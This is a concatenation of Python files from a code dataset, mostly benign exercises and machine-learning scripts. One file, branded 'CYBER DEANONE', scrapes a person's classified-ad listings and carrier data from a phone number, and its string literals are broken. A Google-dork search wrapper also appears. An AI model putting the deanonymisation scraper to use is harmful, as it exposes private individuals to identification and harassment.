epoch_acc","sub_path":"src/trainer/MultitaskTrainer.py","file_name":"MultitaskTrainer.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"282388160","text":"# -*- coding: utf-8 -*-\n\n#\n# You are now the scorekeeper for a baseball game.\n# You are given a list of strings; each string is one of the following four types:\n# 1. An integer (a round's score): the number of points you score in this round.\n# 2. \"+\" (a round's score): this round's score is the sum of the previous two valid rounds' scores.\n# 3. \"D\" (a round's score): this round's score is double the previous valid round's score.\n# 4. 
\"C\"(一个操作,这不是一个回合的分数):表示您获得的最后一个有效 回合的分数是无效的,应该被移除。\n#\n# 每一轮的操作都是永久性的,可能会对前一轮和后一轮产生影响。\n# 你需要返回你在所有回合中得分的总和。\n\nclass Solution(object):\n\tdef calPoints(self, ops):\n\t\t\"\"\"\n\t\t:type ops: List[str]\n\t\t:rtype: int\n\t\t\"\"\"\n\t\tarr = []\n\t\tfor o in ops:\n\t\t\tif o == \"C\":\n\t\t\t\tarr.pop()\n\t\t\telif o == \"D\":\n\t\t\t\tn = len(arr)\n\t\t\t\tif n:\n\t\t\t\t\tlast_point = arr[n-1]\n\t\t\t\t\tarr.append(last_point * 2)\n\t\t\telif o == \"+\":\n\t\t\t\tn = len(arr)\n\t\t\t\tif n > 1:\n\t\t\t\t\tarr.append(arr[-1] + arr[-2])\n\t\t\telse:\n\t\t\t\tarr.append(int(o))\n\t\treturn sum(arr)\n\n\nif __name__ == \"__main__\":\n\tnums1 = [\"5\", \"-2\", \"4\", \"C\", \"D\", \"9\", \"+\", \"+\"]\n\ta = Solution().calPoints(nums1)\n\tprint(a)\n","sub_path":"stack/easy/q05.py","file_name":"q05.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"373475309","text":"from bisect import bisect_left\n\nclass Solution:\n def searchMatrix(self, matrix, target):\n \"\"\"\n :type matrix: List[List[int]]\n :type target: int\n :rtype: bool\n \"\"\"\n if matrix == []: return False\n Y = len(matrix[0])\n for m in matrix:\n idx = bisect_left(m, target)\n if idx < Y and m[idx] == target: return True\n return False\n","sub_path":"240_search-a-2d-matrix-ii.py","file_name":"240_search-a-2d-matrix-ii.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"20726424","text":"import pandas as pd\nfrom sklearn.metrics.cluster import adjusted_rand_score\nimport numpy as np\nimport Comparison\nimport sys\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom SplitData import Spliter\nfrom bisect_louvain import * #import louvain clustering \nfrom SemiClassifier import SemiClassifier\n\nfor prefixFileName in [\"pollen\", \"patel\", \"baron\"]:\n# for prefixFileName in [\"pollen\"]:\n print(\"===========================================================================\")\n print(\"===========================================================================\")\n fileName = \"Data/\" + prefixFileName + \"-prepare-log_count_100pca.csv\"\n df = pd.read_csv(fileName)\n Xy= df.values\n X= Xy[:,1:]\n y= Xy[:,0].astype(int)\n for left_out_proportion in [0.0, 0.2, 0.5, 0.9]:\n # for left_out_proportion in [0.5]:\n # print(\"===================xxxxxxxxxxxxxxxxxxxxxxx================================\")\n print(\"Data: \", prefixFileName, \", left_out_proportion = \", left_out_proportion)\n for data_seed in range(5):\n proportion_unknown = 0.2\n \n spl = Spliter(proportion_unknown = proportion_unknown, left_out_proportion = left_out_proportion, random_seed = data_seed)\n train_indices, test_indices, unknown_classes = spl.Split(X, y)\n \n X_train = X[train_indices]\n X_test = X[test_indices]\n y_train = y[train_indices]\n y_test = y[test_indices]\n\n k1 = len(set(y_test))\n k2 = len(set(y))\n \n y_louvain = louvain_exact_K(X_test, k1)\n\n # y_full_louvain = louvain_exact_K(X[train_indices+test_indices], k2)\n # y_full_louvain = y_full_louvain[len(y_train): len(y)]\n\n # just joint clustering \n y_full_semilouvain = semi_louvain_exact_K(X_train, y_train, X_test, k2)\n y_full_semilouvain = y_full_semilouvain[len(y_train): len(y)]\n\n # joint clustering + SVM \n clf = SemiClassifier()\n y_predict = clf.predict(X_train, y_train, X_test, k2 + 1)\n\n print(\"Louvain on test set: \", adjusted_rand_score(y_louvain, y_test))\n # print(\"Louvain 
on full set: \", adjusted_rand_score(y_full_louvain, y_test))\n print(\"Semi-Louvain ARI : \", adjusted_rand_score(y_full_semilouvain, y_test))\n print(\"Semi-LouSVM ARI : \", adjusted_rand_score(y_predict, y_test))\n\n # print(\"Train class: \", np.unique(y_train))\n # print(\"New class: \", set(y_test).difference(set(y_train)))\n # print(y_test)\n # print(y_predict)\n print(\"========================================================\")\n \n \n \n \n","sub_path":"test_semi_classifier.py","file_name":"test_semi_classifier.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"511172623","text":"import argparse\nimport rnn_estimator_factory\nimport tempfile\n\nif __name__ == '__main__':\n # parse command line argument for hyper parameter input\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--output_dir',\n help='location to write checkpoints and export trained model',\n required=True\n )\n parser.add_argument(\n '--model_version',\n help='Specify the version of the recurrent model with attention to train. [lstm_attention, gru_attention] ',\n required=True\n )\n parser.add_argument(\n '--embedding_path',\n help='Optional, path to the embedding location'\n )\n parser.add_argument(\n '--embedding_dim',\n help='Optional, the dimension of the embedding to be used, if pre trained embedding is specified, should match with the embedding',\n type=int,\n default=200\n )\n parser.add_argument(\n '--num_epochs',\n help='Number of epochs to go through the data, default to 10',\n default=10,\n type=int\n )\n parser.add_argument(\n '--batch_size',\n help='number of records to read during each training step, default to 100',\n default=100,\n type=int\n )\n parser.add_argument(\n '--learning_rate',\n help='learning rate for gradient descent, required for model train',\n default=0.00001,\n type=float\n )\n parser.add_argument(\n '--dropout_rate',\n help='dropout rate used inside the convolutional network to regularize model from being overfit',\n default=0.2,\n type=float\n )\n parser.add_argument(\n '--vocab_size',\n help='set the size limit of text corpus used on the tokenization for sentence vocabulary',\n default=50000,\n type=int\n )\n parser.add_argument(\n '--max_sequence_length',\n help='set the limit of maximum sequence length used for padding',\n default=300,\n type=int\n )\n parser.add_argument(\n '--rnn_units',\n help='Specifies the dimension of the RNN weights',\n type=int\n )\n\n\n args, _ = parser.parse_known_args()\n hparams = args.__dict__\n output_dir = hparams.pop('output_dir')\n\n rnn_estimator_factory.MAX_SEQUENCE_LENGTH = hparams.pop('max_sequence_length')\n rnn_estimator_factory.VOCAB_SIZE= hparams.pop('vocab_size')\n rnn_estimator_factory.EMBEDDING_DIM= hparams.pop('embedding_dim')\n \n\n # Initialize the training and evaluation\n rnn_estimator_factory.train_and_evaluate(output_dir, hparams)","sub_path":"estimator_RNN/rnn_estimator_task.py","file_name":"rnn_estimator_task.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"529380536","text":"from enum import Enum\r\nfrom datetime import datetime\r\nfrom abc import *\r\n\r\nquantity_list = []\r\n\r\n\r\nclass Item_Type(Enum):\r\n ENTRY = 1\r\n PREMIUM = 2\r\n HIGH_END = 3\r\n NOT_ASSIGNED = None\r\n\r\n\r\nclass Item:\r\n def __init__(self, id: int):\r\n self.id = id\r\n self.type = -1\r\n self.price = 1000\r\n self.quantity = 
1000\r\n        self.last_updated = None\r\n        self.replenished = 0\r\n\r\n\r\n    def retrieve(self, qty, date):\r\n        self.last_updated = date\r\n        self.quantity -= qty\r\n        print(self.quantity)\r\n        print(qty)\r\n        quantity_list.append(self.quantity)\r\n        print(quantity_list)\r\n        if self.quantity < 10:\r\n            self.quantity = 50\r\n            self.replenished += 1\r\n\r\n\r\n\r\n\r\nclass Customer:\r\n    ID_Cnt = 0\r\n    store_name = \"ISE4032\"\r\n\r\n    def __init__(self, l_name: str, f_name: str):\r\n        self.last_name = l_name  # (1) instance variables owned by each object\r\n        self.first_name = f_name\r\n        self.reg_date = None\r\n        self.birth_date = None\r\n        self.gender = None\r\n        self.total_won = 0\r\n        self.num_purchase = 0\r\n        self.last_visited = None\r\n        self.id = Customer.get_id(self)\r\n\r\n    def __str__(self):  # __str__ override - makes debugging easier\r\n        return '[' + str(self.id) + ']' + str(self.last_name) + ' ' + str(self.first_name)\r\n\r\n    def get_id(self):\r\n        Customer.ID_Cnt += 1\r\n        return Customer.ID_Cnt\r\n\r\n    def consume(self, target_item: Item, qty, date):\r\n        self.num_purchase += 1\r\n        self.total_won += target_item.price * qty\r\n        self.last_visited = date\r\n        target_item.retrieve(qty, date)\r\n\r\n\r\n    def reset_record(self):\r\n        self.num_purchase = 0\r\n        self.total_won = 0\r\n        self.last_visited = None\r\n        return self\r\n\r\n\r\nclass Member(Customer):  # inherits from Customer\r\n    # pass  # use the parent's variables and methods as-is (including __init__)\r\n    # overriding\r\n    def __init__(self, l_name: str, f_name: str, since):  # takes a new argument named since\r\n        self.member_since = since\r\n        super().__init__(l_name, f_name)  # override while keeping the parent's original behaviour\r\n\r\n    def consume(self, target_item: Item, qty, date):  # override consume with a new version that also applies the discount\r\n        self.num_purchase += 1\r\n        discount_rate = self.get_discount_rate()\r\n        self.total_won += target_item.price * qty * (1 - discount_rate)\r\n        print('Membership Discount - ' + str(self) + ' gets ' + str(100 * discount_rate) + '%')\r\n        self.last_visited = date\r\n        target_item.retrieve(qty, date)\r\n\r\n    def get_discount_rate(self):  # declare a new method that computes the discount rate - exists only in Member\r\n        time_now = datetime.now()\r\n        time_diff = time_now - self.member_since\r\n        if time_diff.days > 90:\r\n            return 0.05\r\n        else:\r\n            return 0.01\r\n\r\n\r\nclass ItemBase(metaclass=ABCMeta):  # ABC - Abstract Base Class; metaclass syntax for defining abstract classes\r\n    @abstractmethod  # method definition using a decorator\r\n    def retrieve(self):\r\n        pass\r\n\r\n    @abstractmethod\r\n    def get_stock(self):\r\n        print('Retrieved!')\r\n\r\n\r\nclass Item_New(ItemBase):\r\n    def retrieve(self):\r\n        print('[New] Retrieved!')\r\n\r\n    def get_stock(self):\r\n        pass\r\n\r\n","sub_path":"jts_project/ise4032_class.py","file_name":"ise4032_class.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"41971963","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport csv\nimport seaborn as sns\n\ndf = pd.read_csv('resource_v4.csv', header=None)\n\na = np.array(df)\n\ncount_row = a.shape[0]\ncount_col = a.shape[1]\nprint(\"row\", count_row)\nprint(\"col\", count_col)\n\ncount = 0\n# for indexing location of the resource\nidx = 0\nA = np.zeros((100))\nB = np.zeros((100))\nx = np.array(range(1,101))\n\n\nfor j in range(0, count_col):\n    A[a[0][j]-1] = A[a[0][j]-1]+1\nfor j in range(0, count_col):\n    B[a[1][j]-1] = B[a[1][j]-1]+1\nplt.bar(x, A, color='b')\nplt.bar(x, B, color='r', bottom=A)\n\n\nprint(\"check the loop result\")\n#print(overArr)\n\n#plt.bar(x,overArr)\nyy= np.array(range(2+2))\nplt.yticks(yy)\nplt.title('count 
overlapping resource_rho168_30')\n#plt.show()\nplt.savefig(\"overlapping rho168_30\")\n","sub_path":"sim30/rho168/30/자원분표.py","file_name":"자원분표.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"373373684","text":"# There is a natural number N. Determine whether the digits of N's decimal\n# representation can be rearranged into a multiple of N larger than N (2N, 3N, ..., k*N).\n\nfrom itertools import permutations\n\nT = int(input())\n\nfor t in range(1, T+1):\n    check = False\n    NumList = []\n    N = input()\n\n    for i in permutations(N, len(N)):\n        Num = \"\"\n        for j in i:\n            Num += j\n        if Num[0] != '0':\n            if int(Num) not in NumList:\n                NumList.append(int(Num))\n\n    if len(NumList) == 1:\n        print(\"#{} impossible\".format(t))\n        continue\n\n    for i in range(1, len(NumList)):\n        if NumList[i] % NumList[0] == 0:\n            check = True\n\n    if check:\n        print(\"#{} possible\".format(t))\n    else:\n        print(\"#{} impossible\".format(t))","sub_path":"SWEA/D3/숫자가 같은 배수.py","file_name":"숫자가 같은 배수.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"279351441","text":"import requests\nimport html2text\nimport bs4\nimport os\nos.system('clear')\nbanner = 'Developer: CyberUSA\nVK: https://vk.com/CyberUSA\nTelegram: @CyberUSA\n\n'\n\nprint(banner)\nprint('CYBER DEANONE V 1.1')\n\ndef avito():\n\tprint('Avito data parser\n')\n\tphone = input('Enter number: +7')\n\tres = requests.get('https://mirror.bullshit.agency/search_by_phone/' + phone)\n\tb=bs4.BeautifulSoup(res.text, \"html.parser\")\n\n\tp = b.select('.text-muted')\n\tk = 0\n\tfor i in p:\n\t\tps = p[k].getText()\n\t\tprint(ps.strip())\n\t\tk=k+1\n\n##avito(phone)\n##input('Press any key to continue')\n\n\ndef operator():\n\t\n\tphone = input('Enter number: +7')\n\tres = requests.get('https://tel-search.ru/numbers/phone=' + phone)\n\tb=bs4.BeautifulSoup(res.text, \"html.parser\")\n\tp = b.select('.jumbotron')\n\tk = 0\n\tos.system('clear')\n\tprint('Data for the number\n\n')\n\tfor i in p:\n\t\tps = p[k].getText()\n\t\tprint(ps.strip(), '\n\n')\n\t\tk=k+1\n\t\t\n\t\t\noperator()\ninput('\nPress ENTER\n\n')\nos.system('clear')\navito()\n","sub_path":"CyberUSA.py","file_name":"CyberUSA.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"132190257","text":"from googlesearch import search\nimport time\nimport json\n\n\nclass Dorks:\n    def __init__(self, dork, tld, lang, num, start, stop, pause):\n        \"\"\"\n        :param dork:\n        :param tld:\n        :param lang:\n        :param num:\n        :param start:\n        :param stop:\n        :param pause:\n        \"\"\"\n        self.dork = dork\n        self.tld = tld\n        self.lang = lang\n        self.num = num\n        self.start = start\n        self.stop = stop\n        self.pause = pause\n\n    def search_list(self):\n        counter = 0\n        requ = 0\n        retorno = []\n        for results in search(self.dork, self.tld, self.lang, self.num, self.start, self.stop, self.pause):\n            counter = counter + 1\n            time.sleep(0.1)\n            requ += 1\n            if requ >= 
int(self.num):\n                break\n\n            data = (counter, results)\n            retorno.append(results)\n        return retorno\n\n    def search_json(self):\n        # serialise the result URLs as a JSON string (the original returned early, leaving dead code behind)\n        result = [{\"url\": i} for i in self.search_list()]\n        return json.dumps(result)\n\n    def search(self):\n        counter = 0\n        requ = 0\n        for results in search(self.dork, self.tld, self.lang, self.num, self.start, self.stop, self.pause):\n            counter = counter + 1\n            time.sleep(0.1)\n            requ += 1\n            if requ >= int(self.num):\n                break\n\n            data = (counter, results)\n        return results\n\n\n#a = Dorks(dork='site:elera.com +filetype:pdf', tld='com', lang='en', num=30, start=0, stop=2, pause=2).search()\n#print(a)\n","sub_path":"blackdogosint/osint/Search/google/dorks.py","file_name":"dorks.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"228656082","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"\nCache temperature specifies how the browser cache should be configured before\nthe page run.\n\nSee design doc for details:\nhttps://docs.google.com/document/u/1/d/12D7tkhZi887g9d0U2askU9JypU_wYiEI7Lw0bfwxUgA\n\"\"\"\n\nimport logging\nfrom telemetry.core import util\n\n# Default Cache Temperature. The page doesn't care which browser cache state\n# it is run on.\nANY = 'any'\n# Emulates PageCycler V1 cold runs. Clears system DNS cache, browser DiskCache,\n# net/ predictor cache, and net/ host resolver cache.\nPCV1_COLD = 'pcv1-cold'\n# Emulates PageCycler V1 warm runs. Ensures that the page was visited at least\n# once just before the run.\nPCV1_WARM = 'pcv1-warm'\n\n\ndef EnsurePageCacheTemperature(page, browser, previous_page=None):\n  temperature = page.cache_temperature\n  logging.info('PageCacheTemperature: %s', temperature)\n\n  if temperature == ANY:\n    return\n  elif temperature == PCV1_COLD:\n    any_valid_tab = browser.tabs[0]\n    any_valid_tab.ClearCache(force=True)\n  elif temperature == PCV1_WARM:\n    if (previous_page is not None and\n        previous_page.url == page.url and\n        (previous_page.cache_temperature == PCV1_COLD or\n         previous_page.cache_temperature == PCV1_WARM)):\n      return\n\n    tab = browser.tabs[0]\n    tab.ExecuteJavaScript(\n        \"\"\"console.time('telemetry.internal.warmCache.start');\"\"\")\n    tab.ExecuteJavaScript(\n        \"\"\"console.timeEnd('telemetry.internal.warmCache.start');\"\"\")\n    tab.Navigate(page.url)\n    util.WaitFor(tab.HasReachedQuiescence, 60)\n    tab.WaitForDocumentReadyStateToBeComplete()\n    tab.Navigate(\"about:blank\")\n    tab.WaitForDocumentReadyStateToBeComplete()\n    tab.ExecuteJavaScript(\n        \"\"\"console.time('telemetry.internal.warmCache.end');\"\"\")\n    tab.ExecuteJavaScript(\n        \"\"\"console.timeEnd('telemetry.internal.warmCache.end');\"\"\")\n","sub_path":"telemetry/telemetry/page/cache_temperature.py","file_name":"cache_temperature.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"485470540","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport directory.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Alumnus',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('gender', models.IntegerField(choices=[(0, b'Male'), (1, b'Female')])),\n                ('photo', models.ImageField(null=True, upload_to=directory.models.upload_to_photo)),\n                ('cv', models.FileField(null=True, upload_to=directory.models.upload_to_cv)),\n                ('phone1', models.CharField(max_length=20, null=True)),\n                ('phone2', models.CharField(max_length=20, null=True)),\n                ('postal', models.CharField(max_length=160, 
null=True)),\n ('website', models.URLField(null=True)),\n ('presentation', models.TextField(null=True)),\n ('diploma', models.CharField(max_length=80, null=True)),\n ('company', models.CharField(max_length=160, null=True)),\n ('job', models.CharField(max_length=160, null=True)),\n ('keywords', models.CharField(max_length=1000, null=True)),\n ('privacy', models.BooleanField(default=1, choices=[(0, b'Hide name in the unauthenticated area'), (1, b'Display name in the unauthenticated area')])),\n ],\n ),\n migrations.CreateModel(\n name='Domain',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=80)),\n ],\n ),\n migrations.CreateModel(\n name='Year',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n ),\n migrations.AddField(\n model_name='alumnus',\n name='domain',\n field=models.ForeignKey(to='directory.Domain', null=True),\n ),\n migrations.AddField(\n model_name='alumnus',\n name='user',\n field=models.OneToOneField(to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='alumnus',\n name='year',\n field=models.ForeignKey(to='directory.Year'),\n ),\n ]\n","sub_path":"directory/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"184466680","text":"import numpy as np\nimport cv2\n#from picamera.array import PiRGBArray\n#from picamera import PiCamera\n#import time\n\n# multiple cascades: https://github.com/Itsee/opencv/tree/master/data/haarcascades\n\n#https://github.com/Itseez/opencv/blob/master/data/haarcascades/haarcascade_frontalface_default.xml\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n#https://github.com/Itseez/opencv/blob/master/data/haarcascades/haarcascade_eye.xml\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\ncap = cv2.VideoCapture(0)\n\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nvideo_writer = cv2.VideoWriter('Output.avi', fourcc, 20, (640,480))\n\nwhile True:\n ret, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n \n eyes = eye_cascade.detectMultiScale(roi_gray)\n for (ex,ey,ew,eh) in eyes:\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n\n cv2.imshow('img',img)\n k = cv2.waitKey(30) & 0xff\n\n \n #If key 'c' is pressed, it will take a picture.\n if k == ord(\"c\"):\n cv2.imwrite('imsexy.png', img)\n \n \n #Record for 5 seconds\n if k == ord(\"r\"):\n while (cap.isOpened()):\n ret, img = cap.read()\n if ret:\n video_writer.write(img)\n cv2.imshow('Video stream', img)\n else:\n break\n \n \n #Quit the \"Frame\" \n if k == ord(\"q\"):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"Working.py","file_name":"Working.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"212696251","text":"import requests\nfrom azure.mgmt.resource.subscriptions import SubscriptionClient\nfrom azure.mgmt.resource.resources import ResourceManagementClient\n\nfrom azure_identity_credential_adapter import AzureIdentityCredentialAdapter\ncredentials = AzureIdentityCredentialAdapter()\n\nLOCATION 
= 'westus'\n\nprint('Retrieving AppMetadata')\n\nr = requests.get(\"http://localhost:5000/appmetadata\")\napp_metadata = r.json()\n\nprint('Retrieving Subscriptions')\n\nsubscription_client = SubscriptionClient(credentials)\nsubscriptions = subscription_client.subscriptions.list()\n\nfor subscription in subscriptions:\n resource_client = ResourceManagementClient(\n credentials, subscription.subscription_id)\n\n resources_with_appid_tag = resource_client.resource_groups.list(\n filter=\"tagName eq 'appid'\")\n\n for resource in resources_with_appid_tag:\n print(f'Syncing {resource.name}')\n\n app_metadatum = next(\n (x for x in app_metadata if x['id'] == resource.tags['appid']), None)\n\n if app_metadatum is not None:\n resource.tags.update({'business-owner': app_metadatum['businessOwner'], 'tech-owner': app_metadatum['techOwner']})\n tag_update = resource_client.tags.update_at_scope(resource.id, 'Merge', {'tags': resource.tags})\n print(tag_update)\n #tag_update = resource_client.resource_groups.create_or_update(resource.name, {'location': LOCATION, 'tags': resource.tags})\n\nprint('Done')\n","sub_path":"src/scripts/sync_resources_with_appid_tag.py","file_name":"sync_resources_with_appid_tag.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"584343790","text":"\"\"\"Main application and routing logic for Open AQ.\"\"\"\nfrom decouple import config\nfrom flask import Flask, render_template, request\nfrom .models import DB, Measurement\nfrom .aq_dashboard import load_measurement, filter_ge_pm25\n\n\ndef create_app():\n \"\"\"Create and configure an instance of the Flask application.\"\"\"\n app = Flask(__name__)\n app.config['SQLALCHEMY_DATABASE_URI'] = config('DATABASE_URL')\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n DB.init_app(app)\n\n @app.route('/')\n def root():\n DB.drop_all()\n DB.create_all()\n status = load_measurement()\n message = \"\"\n m = Measurement.query.all()\n if status != 200:\n message = \"Error loading City air quality\"\n\n return render_template('base.html', title='Cities Air Quality',measurements=m, message=message)\n\n @app.route('/compare', methods=['POST'])\n def compare():\n ge_pm25 = request.values['pm25']\n #import pdb; pdb.set_trace()\n if ge_pm25 != \"\" :\n filtered_measurement = filter_ge_pm25(ge_pm25)\n message = \"PM 2.5 greater or equal to \" + ge_pm25\n else:\n filtered_measurement = Measurement.query.all()\n message=\"All PM 2.5\"\n return render_template('base.html', title='Cities Air Quality',measurements=filtered_measurement, message=message)\n\n @app.route('/reset')\n def reset():\n DB.drop_all()\n DB.create_all()\n return render_template('base.html', title='DB Reset! 
')\n\n\n return app\n\n","sub_path":"SC/cityair/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"559074373","text":"### this file is made by gohyojun\nimport argparse\nimport os\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nfrom scipy.ndimage.filters import gaussian_filter\nimport numpy as np\n\nfrom tqdm import tqdm\n\"\"\"\nDensity map input out에 대한 입력 출력 간의 관계\ninput : main argument in this file\noutput: denstiy map \n\"\"\"\n\nparser = argparse.ArgumentParser(description=\"generate density map for crane\")\n# image root\nparser.add_argument(\"--image_root\",type=str,help=\"image data root\")\n# ground truth root (대가리에 점찍은거 어디있는지)\nparser.add_argument(\"--ground_truth_root\",type=str,help=\"ground truth root\")\n# output root. densitiy map 어디다 저장할지 (생성해줌)\nparser.add_argument(\"--density_map_root\",type=str,help=\"output densitiy map root\")\n\n\n\"\"\"\"\"\nargument_example\n--image_root /home/gohyojun/바탕화면/Anthroprocene/Dataset/crane --ground_truth_root /home/gohyojun/바탕화면/Anthroprocene/Dataset/crane_labeled --density_map_root /home/gohyojun/바탕화면/Anthroprocene/Dataset/density_map \n\"\"\"\n\n\ndef generate_fixed_kernel_densitymap(image,points,sigma=15):\n '''\n Use fixed size kernel to construct the ground truth density map\n for ShanghaiTech PartB.\n image: the image with type numpy.ndarray and [height,width,channel].\n points: the points corresponding to heads with order [col,row].\n sigma: the sigma of gaussian_kernel to simulate a head.\n '''\n # the height and width of the image\n image_h = image.shape[0]\n image_w = image.shape[1]\n\n # coordinate of heads in the image\n points_coordinate = points\n # quantity of heads in the image\n points_quantity = len(points_coordinate)\n\n # generate ground truth density map\n densitymap = np.zeros((image_h, image_w))\n for point in points_coordinate:\n c = min(int(round(point[0])),image_w-1)\n r = min(int(round(point[1])),image_h-1)\n # point2density = np.zeros((image_h, image_w), dtype=np.float32)\n # point2density[r,c] = 1\n densitymap[r,c] = 1\n # densitymap += gaussian_filter(point2density, sigma=sigma, mode='constant')\n densitymap = gaussian_filter(densitymap, sigma=sigma, mode='constant')\n\n densitymap = densitymap / densitymap.sum() * points_quantity\n return densitymap\n\nif __name__ == '__main__':\n\n args = parser.parse_args()\n # TODO Training test\n # phase_list = ['train','test']\n\n if not os.path.exists(args.density_map_root):\n os.mkdir(args.density_map_root)\n image_file_list = os.listdir(args.image_root)\n\n index = 0\n for image_file in tqdm(image_file_list):\n image_path = args.image_root+\"/\" + image_file\n\n if not os.path.isfile(image_path):\n continue\n\n # FIXME\n # math file rule이 같은 이름에 .jpg를 .mat 로\n mat_path = args.ground_truth_root+ \"/\" + image_file\n mat_path = mat_path[0:-3] + \"mat\"\n image = plt.imread(image_path)\n # todo 이거 연관성 써놔야함\n # todo 모든 클래스에대해서 어떻게 저장할지도 생각해놔야함\n # densitymap root\n density_path = args.density_map_root + \"/\" + image_file\n density_path = density_path[0:-3] + \"npy\"\n ################\n \"\"\"\n matlab file debugging.\n \n in matfile\n \n head_class0 : 두루미 성조 \n head_class1\n head_class2\n head_class3\n head_class4\n body_class5\n body_class6\n body_class7\n body_class8\n body_class9\n \"\"\"\n ################\n\n\n mat = loadmat(mat_path)\n points = mat[\"class0\"][0][0][0][0][0]\n\n\n\n\n\n\n\n # points = 
mat['head_class0'][0][0][0][0][0]\n densitymap = generate_fixed_kernel_densitymap(image, points, sigma=15)\n np.save(density_path,densitymap)\n\n","sub_path":"data_preparation/dmap_for_crane.py","file_name":"dmap_for_crane.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"292835065","text":"import glob\nimport os\nimport re\nimport pandas as pd\nimport numpy as np\nfrom collections import Counter\npath = \"files/\"\nfiles = glob.glob(path+\"*.txt\")\n\n# first we need a list of all words in all files.\nfinalDataframe = pd.DataFrame()\nfor file in files:\n with open(file, mode=\"r\") as f:\n data = f.read()\n # Split data into array of words, non case sensitive\n word = re.split(r\"\\W+\", data, flags=re.IGNORECASE)\n # Remove white spaces and empty strings\n cleanWords = [line for line in [l.strip() for l in word] if line]\n # Remove duplicates, we don't want them\n words = list(set(cleanWords))\n # Add data into dictionary\n dictionary = {\"filename\":file, \"values\":pd.Series(words)}\n finalDataframe = finalDataframe.append(pd.DataFrame(dictionary))\n \n \n# list of words in total\nwordstmp = finalDataframe['values']\ndic2 = { \"words\" : wordstmp }\ndf1 = pd.DataFrame(dic2)\ndf1 = df1.set_index(\"words\")\n\nsss2 = [finalDataframe['filename']=='files/file2.txt']\nsss1 = [finalDataframe['filename']=='files/file1.txt']\nsss1[0]\n\ndd1=list(sss1[0])\ndf1['file1']= dd1\n\ndd2=list(sss2[0])\ndf1['file2']=dd2\n\nfinalDataframe['file1']=dd1\nfinalDataframe['file2']=dd2\n\ntest1=pd.pivot_table(finalDataframe, values=['file1','file2'],index=['values'])\n\ntest3 = pd.crosstab(finalDataframe['values'], finalDataframe['filename'], margins=True)\n\n\n# Remove last column which is the total. 
